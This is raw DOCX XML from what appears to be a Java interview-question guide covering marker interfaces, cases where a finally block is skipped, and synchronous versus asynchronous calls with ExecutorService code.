    <w:p w14:paraId="1474D40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or class checks if the object implements the Validatable interface using instanceof.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F7AFD1"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program can handle the User object differently based on whether it implements the marker interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1920CE81"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s of Marker Interfaces in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9EDBB8"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rializable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Marks a class as being serializable (i.e., its state can be saved to a stream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5FE5CD"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Cloneable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Marks a class as being cloneable (i.e., it allows for creating a copy of an object via Object.clone()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FFE003"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Remote</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Marks a class as a remote object in the RMI (Remote Method Invocation) system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B419434"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Benefits of Using Marker Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDF62CF"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paration of concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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creased flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: The marker interface pattern allows for flexibility and extension without changing existing code. New marker interfaces can be introduced to give classes special abilities or properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5A2969"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ty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Using instanceof with a marker interface provides a safe way to check for specific capabilities, avoiding potential errors or casting issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F37F2D"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onclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2662DF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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEEE259" w14:textId="77ACB1A6" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="00112FB2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc197867262"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How can we ignore the finally block</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="032179AD" w14:textId="0CCB59D0" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014A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System.exit() is called in the try or catch block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2761789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ystem.exit() method terminates the JVM immediately, and any code after that (including the finally block) will not be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615CD66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060C79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BD670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C96A94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AE7CB0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0963952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exit</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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Terminate the JVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5E681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CD040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catch block"</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4020D5D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6B95E2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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// This will not be executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505D89A2"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2F75DDA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7C5F6CF"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AEA7A5D" w14:textId="2283C3D1"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FF310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70987A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13A5F9E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the System.exit(0) call causes the program to terminate before the finally block is reached, so it is ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61709311"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the thread executing the finally block is interrupted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C6DAF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26252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0F3810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throws</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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8A92F5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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread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new</w:t>
      </w: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g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D896ED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6D6F2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6D4E8847"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8CF0CD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A2BA609"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378D87B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Simulating long-running task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9BD576"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458FE3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Finally block was interrupted"</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551E32F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02970308"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65C0BB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439719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start</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC6F0F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Wait for the thread to start execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D160D8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interrupt</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Interrupt the thread during the execution of finally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021245C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885BE41" w14:textId="593C2AB5"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E493E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A09BE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32DB7B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was interrupted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292901E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finally block is interrupted during execution, and the exception InterruptedException is caught, causing the block to exit prematurely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253B9925"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f the JVM crashes (Fatal Errors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6EF52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s of a JVM crash or severe errors (such as OutOfMemoryError or StackOverflowError), the finally block may not be executed because the JVM itself is terminating abnormally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC0F6A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7B704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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FinallyExample</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5B8E2968"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static</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</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7D752AB"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r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1A8B6CCC"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try block"</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D99F8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Simulating an error that causes the JVM to crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CAF56F"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hrow</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OutOfMemoryError</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39367E1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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>finall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A8F046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This will not be executed if JVM crashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA7CB8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finally block"</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F383FE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3BF95C4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4EEEB367" w14:textId="0E6EA928"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00994D39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB2AEE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While these scenarios are rare, they do demonstrate situations where the finally block might not be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EC8BBD"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4B9CEDD"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exit()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exits the JVM, preventing the finally block from running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7741E234"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interruption</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the thread is interrupted during the finally block's execution, it may not complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358FD0A3"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crashes or fatal errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The finally block may not be executed if the JVM crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6943DED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general, the finally block is designed to always execute, but the above exceptions are cases where it might be skipped or ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AB9086" w14:textId="720DEA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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24281880" w14:textId="2E39792A" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="00292109">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc197867263"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is synchronous and asynchronous call</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="54E963EF" w14:textId="0370E86F" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B172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 Call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ABB3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synchronous call</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E11E9A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Synchronous Call:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603D6F54"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The program execution halts until the current operation is completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE4C42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The tasks are executed in sequence, and the next task is dependent on the completion of the previous one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7646EA4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ear Execution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Each task waits for the previous one to finish before it starts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1997AB1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1AE310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29C9FB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DA7B07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752939D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p>
    <w:p w14:paraId="499CD5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Finished"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C7E9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306104E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0540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0592AA4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9AF7B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621D77A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F85060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D45471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75C5CDB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71EF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6E094AE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CAD4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0DF8F5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0B8A2E9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F2AC6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7188B4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43A4B5A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20D8C53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712C61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473F6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41316FD" w14:textId="72463B24"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4172372F" w14:textId="77777777" w:rsidR="00BB17F1" w:rsidRDefault="00BB17F1" w:rsidP="00B17288">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FDE20C1" w14:textId="0B57C6CC"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479B54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2D0B11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C9F30B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221C7A8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399560A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has to finish before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can start, as the program execution is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> during task1() and task2().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AA2882"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76F7EC">
          <v:rect id="_x0000_i1174" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E0D96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 Call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0100CD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n </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous call</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the program does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not wait</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the operation to complete. The operation is executed in the background, and the program continues executing other tasks without waiting for the current one to finish. The calling thread </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but instead proceeds to the next task. The result of the operation is usually provided via a callback or a future result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CC679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synchronous Call:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAE7B00"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The caller is free to continue execution while waiting for the task to finish in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B172F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xml:space="preserve"> Multiple tasks can run concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C95876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llback/Promise:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Often involves some mechanism to handle the result once the operation is complete (like a callback function, promise, or future).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F79B59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E35B2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import</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> java</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>util</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D5A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2EB92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A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27073D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F193F4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069E1C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7AC8938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Asynchronous task execution using ExecutorService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD07D4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ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> executor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ors</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>newSingleThreadExecutor</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0863FC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Future</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
